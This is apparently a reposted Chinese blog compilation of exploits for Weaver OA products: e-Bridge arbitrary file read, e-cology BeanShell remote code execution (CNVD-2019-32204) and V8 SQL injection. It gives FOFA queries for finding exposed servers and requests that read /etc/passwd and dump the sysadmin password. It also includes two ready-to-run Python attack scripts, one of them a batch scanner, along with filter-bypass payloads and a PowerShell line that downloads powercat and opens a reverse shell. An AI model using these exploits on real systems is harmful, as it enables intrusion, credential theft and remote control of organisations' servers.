泛微OA漏洞(综合)
小駭客圖片在F12sec看月球師傅文章看到的
感覺挺好看,就做封面了
【李淳罡:】借🗡一用(我是不會(huì)告訴你我剛從東海武帝城過來(lái)的哦😏)
目錄
1. 泛微云橋 e-Bridge 任意文件讀取
1.1 漏洞描述
1.3 影響版本
1.2 FOFA
1.4 漏洞復(fù)現(xiàn)
1.5 漏洞利用poc腳本
2. 泛微OA Bsh 遠(yuǎn)程代碼執(zhí)行漏洞 CNVD-2019-32204
2.1 漏洞描述
2.2 FOFA
2.3 影響版本
2.4 漏洞復(fù)現(xiàn)
2.5 poc腳本批量利用
?3. 泛微OA V8 SQL注入漏洞
3.1 漏洞描述
3.2 FOFA
?3.3 影響版本
3.4 漏洞復(fù)現(xiàn)
3.5 漏洞利用腳本
1. 泛微云橋 e-Bridge 任意文件讀取
1.1 漏洞描述
泛微云橋(e-Bridge)是上海泛微公司在”互聯(lián)網(wǎng)+”的背景下研發(fā)的一款用于橋接互聯(lián)網(wǎng)開放資源與企業(yè)信息化系統(tǒng)的系統(tǒng)集成中間件。泛微云橋存在任意文件讀取漏洞,攻擊者成功利用該漏洞,可實(shí)現(xiàn)任意文件讀取,獲取敏感信息
1.3 影響版本
泛微云橋 e-Bridge 2018-2019 多個(gè)版本
1.2 FOFA
title="泛微云橋e-Bridge"
1.4 漏洞復(fù)現(xiàn)
1.4.1 Windows
訪問路徑
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/windows/win.ini&fileExt=txt成功返回 id值,說(shuō)明含有此漏洞
調(diào)用查看文件接口訪問
/file/fileNoLogin/id值1.4.2 Linux
訪問路徑
http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt成功返回 id值,說(shuō)明含有此漏洞
調(diào)用查看文件接口訪問
http://xxx.xxx.xxx.xxx/file/fileNoLogin/id值1.5 漏洞利用poc腳本
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from?? : http://wiki.peiqi.tech
import base64
import requests
import random
import re
import json
import sys
def title():
??? print('+------------------------------------------')
??? print('+? \033[34mPOC_Des: http://wiki.peiqi.tech?????????????????????????????????? \033[0m')
??? print('+? \033[34mGithub : https://github.com/PeiQi0???????????????????????????????? \033[0m')
??? print('+? \033[34m公眾號(hào) : PeiQi文庫(kù)???????????????????????????????????????????????????????? \033[0m')
??? print('+? \033[34mVersion: 泛微云橋 e-Bridge????????????????????????????????????????? \033[0m')
??? print('+? \033[36m使用格式:? python3 poc.py??????????????????????????????????????????? \033[0m')
??? print('+? \033[36mUrl???????? >>> http://xxx.xxx.xxx.xxx???????????????????????????? \033[0m')
??? print('+------------------------------------------')
# 判斷操作系統(tǒng) or 判斷漏洞是否可利用
def POC_1(target_url):
??? vuln_url_1 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt"
??? vuln_url_2 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
??? vuln_url_3 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///&fileExt=txt"
??? headers = {
??????????????? "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
??????????????? "Content-Type": "application/x-www-form-urlencoded"
??? }
??? try:
??????? response_1 = requests.get(url=vuln_url_1, headers=headers, verify=False, timeout=10)
??????? response_2 = requests.get(url=vuln_url_2, headers=headers, verify=False, timeout=10)
??????? response_3 = requests.get(url=vuln_url_3, headers=headers, verify=False, timeout=10)
??????? if "無(wú)法驗(yàn)證您的身份" in response_1.text and "無(wú)法驗(yàn)證您的身份" in response_2.text:
??????????? print("\033[31m[x] 漏洞已修復(fù),不存在漏洞 \033[0m")
??????????? sys.exit(0)
??????? else:
??????????? if "No such file or directory" in response_1.text:
??????????????? print("\033[32m[o] 目標(biāo)為 Linux 系統(tǒng)\033[0m")
??????????????? id = re.findall(r'"id":"(.*?)"', response_3.text)[0]
??????????????? print("\033[32m[o] 成功獲取id:{}\033[0m".format(id))
??????????????? return id,"linux"
??????????? elif "系統(tǒng)找不到指定的路徑" in response_2.text:
??????????????? print("\033[32m[o] 目標(biāo)為 Windows 系統(tǒng)\033[0m")
??????????????? id = re.findall(r'"id":"(.*?)"', response_1.text)[0]
??????????????? print("\033[32m[o] 成功獲取id:{}\033[0m".format(id))
??????????????? return id,"windows"
??????????? else:
??????????????? print("\033[31m[x] 無(wú)法獲取目標(biāo)系統(tǒng)\033[0m")
??????????????? sys.exit(0)
??? except Exception as e:
??????? print("\033[31m[x] 請(qǐng)求失敗:{} \033[0m".format(e))
??????? sys.exit(0)
# 驗(yàn)證漏洞
def POC_2(target_url, id):
??? file_url = target_url + "/file/fileNoLogin/{}".format(id)
??? headers = {
??????? "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
??????? "Content-Type": "application/x-www-form-urlencoded"
??? }
??? try:
??????? response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
??????? response.encoding = 'GBK'
??????? print("\033[32m[o] 成功讀取:\n\033[0m{}".format(response.text))
??? except Exception as e:
??????? print("\033[31m[x] 請(qǐng)求失敗:{} \033[0m".format(e))
??????? sys.exit(0)
# windows 文件讀取
def POC_3(target_url, File):
??? file_url = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/{}&fileExt=txt".format(File)
??? headers = {
??????? "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
??????? "Content-Type": "application/x-www-form-urlencoded"
??? }
??? try:
??????? response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
??????? id = re.findall(r'"id":"(.*?)"', response.text)[0]
??????? print("\033[32m[o] 成功獲取id:{}\033[0m".format(id))
??????? POC_2(target_url, id)
??? except :
??????? print("\033[31m[x] 請(qǐng)求失敗,無(wú)法讀取文件 \033[0m)")
# linux讀取文件
def POC_4(target_url, File):
??? file_url = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://{}&fileExt=txt".format(File)
??? headers = {
??????? "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
??????? "Content-Type": "application/x-www-form-urlencoded"
??? }
??? try:
??????? response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
??????? id = re.findall(r'"id":"(.*?)"', response.text)[0]
??????? print("\033[32m[o] 成功獲取id:{}\033[0m".format(id))
??????? POC_2(target_url, id)
??? except:
??????? print("\033[31m[x] 請(qǐng)求失敗,無(wú)法讀取文件 \033[0m)")
if __name__ == '__main__':
??? title()
??? target_url = str(input("\033[35mPlease input Attack Url\nUrl?? >>> \033[0m"))
??? id,system = POC_1(target_url)
??? POC_2(target_url, id)
??? while True:
??????? if system == "windows":
??????????? File = input("\033[35mFile >>> \033[0m")
??????????? if File == "exit":
??????????????? sys.exit(0)
??????????? else:
??????????????? POC_3(target_url, File)
??????? if system == "linux":
??????????? File = input("\033[35mFile >>> \033[0m")
??????????? if File == "exit":
??????????????? sys.exit(0)
??????????? else:
??????????????? POC_4(target_url, File)
2. 泛微OA Bsh 遠(yuǎn)程代碼執(zhí)行漏洞 CNVD-2019-32204
2.1 漏洞描述
????????2019年9月17日泛微OA官方更新了一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞補(bǔ)丁, 泛微e-cology OA系統(tǒng)的Java Beanshell接口可被未授權(quán)訪問, 攻擊者調(diào)用該Beanshell接口, 可構(gòu)造特定的HTTP請(qǐng)求繞過泛微本身一些安全限制從而達(dá)成遠(yuǎn)程命令執(zhí)行, 漏洞等級(jí)嚴(yán)重
2.2 FOFA
app="泛微-協(xié)同辦公OA"
2.3 影響版本
E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0
2.4 漏洞復(fù)現(xiàn)
直接在網(wǎng)站根目錄后加入組件訪問路徑
/weaver/bsh.servlet.BshServlet/
然后執(zhí)行命令
exec("whoami")
poc
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: xxxxxxxx:8088
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
?關(guān)于繞過
eval%00("ex"%2b"ec(\"whoami\")");
ex\u0065c("cmd /c dir");
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd
2.5 poc腳本批量利用
Vulnerability-analysis/0917/weaver-oa/CNVD-2019-32204 at master · myzing00/Vulnerability-analysis · GitHub
#/usr/bin/python
#coding:utf-8
#Author:Ja0k
#For Weaver-Ecology-OA_RCE
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import requests,sys
headers = {
??? 'Content-Type': 'text/xml; charset=utf-8',
??? 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
??? 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
??? 'Cache-Control': 'max-age=0',
??? 'Content-Type': 'application/x-www-form-urlencoded',
??? 'Upgrade-Insecure-Requests': '1',
??? 'Content-Length': '578'
}
proxies= {'http':'http://127.0.0.1:8080'}
def Poc_check(target):
??? Url_Payload1="/bsh.servlet.BshServlet"
??? Url_Payload2="/weaver/bsh.servlet.BshServlet"
??? Url_Payload3="/weaveroa/bsh.servlet.BshServlet"
??? Url_Payload4="/oa/bsh.servlet.BshServlet"
??? Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw"""
??? Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw"""
??? Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami"""
??? for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4):
??????? url= target + Url_Payload
??????? for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3):
??????????? try:
??????????????? http_response = requests.post(url,data=Data_payload,headers=headers,verify=False)
??????????????? #print http_response.status_code
??????????????? if http_response.status_code == 200:
??????????????????? if ";</script>" not in (http_response.content):
??????????????????????? if "Login.jsp" not in (http_response.content):
??????????????????????????? if "Error" not in (http_response.content):
??????????????????????????????? print("{0} is a E-cologyOA_RCE Vulnerability".format(url))
??????????????????????????????? print("Server Current Username:{0}".format(http_response.content))
??????????????? elif http_response.status_code == 500:
??????????????????? print("{0}500 maybe is Weaver-EcologyOA,Please confirm by yourself ".format(url))
??????????????? else:
??????????????????? pass???????????? ?
??????????? except Exception,Error:
??????????????? pass?? ?
if __name__ == '__main__':
??? for line in open(sys.argv[1]).readlines():
??????? target=line.strip()
??????? Poc_check(target)
3. 泛微OA V8 SQL注入漏洞
3.1 漏洞描述
????????泛微OA V8 存在SQL注入漏洞,攻擊者可以通過漏洞獲取管理員權(quán)限和服務(wù)器權(quán)限
3.2 FOFA
app="泛微-協(xié)同辦公OA"
?3.3 影響版本
泛微OA V8
3.4 漏洞復(fù)現(xiàn)
在getdata.jsp中,直接將request對(duì)象交給此方法處理
weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext)
在getData方法中,判斷請(qǐng)求里cmd參數(shù)是否為空,如果不為空,調(diào)用proc方法
Proc方法4個(gè)參數(shù),(“空字符串”,”cmd參數(shù)值”,request對(duì)象,serverContext對(duì)象)
在proc方法中,對(duì)cmd參數(shù)值進(jìn)行判斷,當(dāng)cmd值等于getSelectAllId時(shí),再?gòu)恼?qǐng)求中獲取sql和type兩個(gè)參數(shù)值,并將參數(shù)傳遞進(jìn)getSelectAllIds(sql,type)方法中
根據(jù)以上代碼流程,只要構(gòu)造請(qǐng)求參數(shù)
?cmd= getSelectAllId&sql=select password as id from userinfo;
即可完成對(duì)數(shù)據(jù)庫(kù)操控
POC
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
查詢HrmResourceManager表中的password字段,頁(yè)面中返回了數(shù)據(jù)庫(kù)第一條記錄的值(sysadmin用戶的password)
解密后即可登錄系統(tǒng)
3.5 漏洞利用腳本
后續(xù)整理
內(nèi)容整理自佩奇師傅:
https://github.com/PeiQi0/PeiQi-WIKI-POC/tree/PeiQi/PeiQi_Wiki/OA產(chǎn)品漏洞/泛微OA
總結(jié)
以上是生活随笔為你收集整理的泛微OA漏洞(综合)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Oracle从小白到大牛的刷题之路(建议
- 下一篇: 前端学习(1857)vue之电商管理系统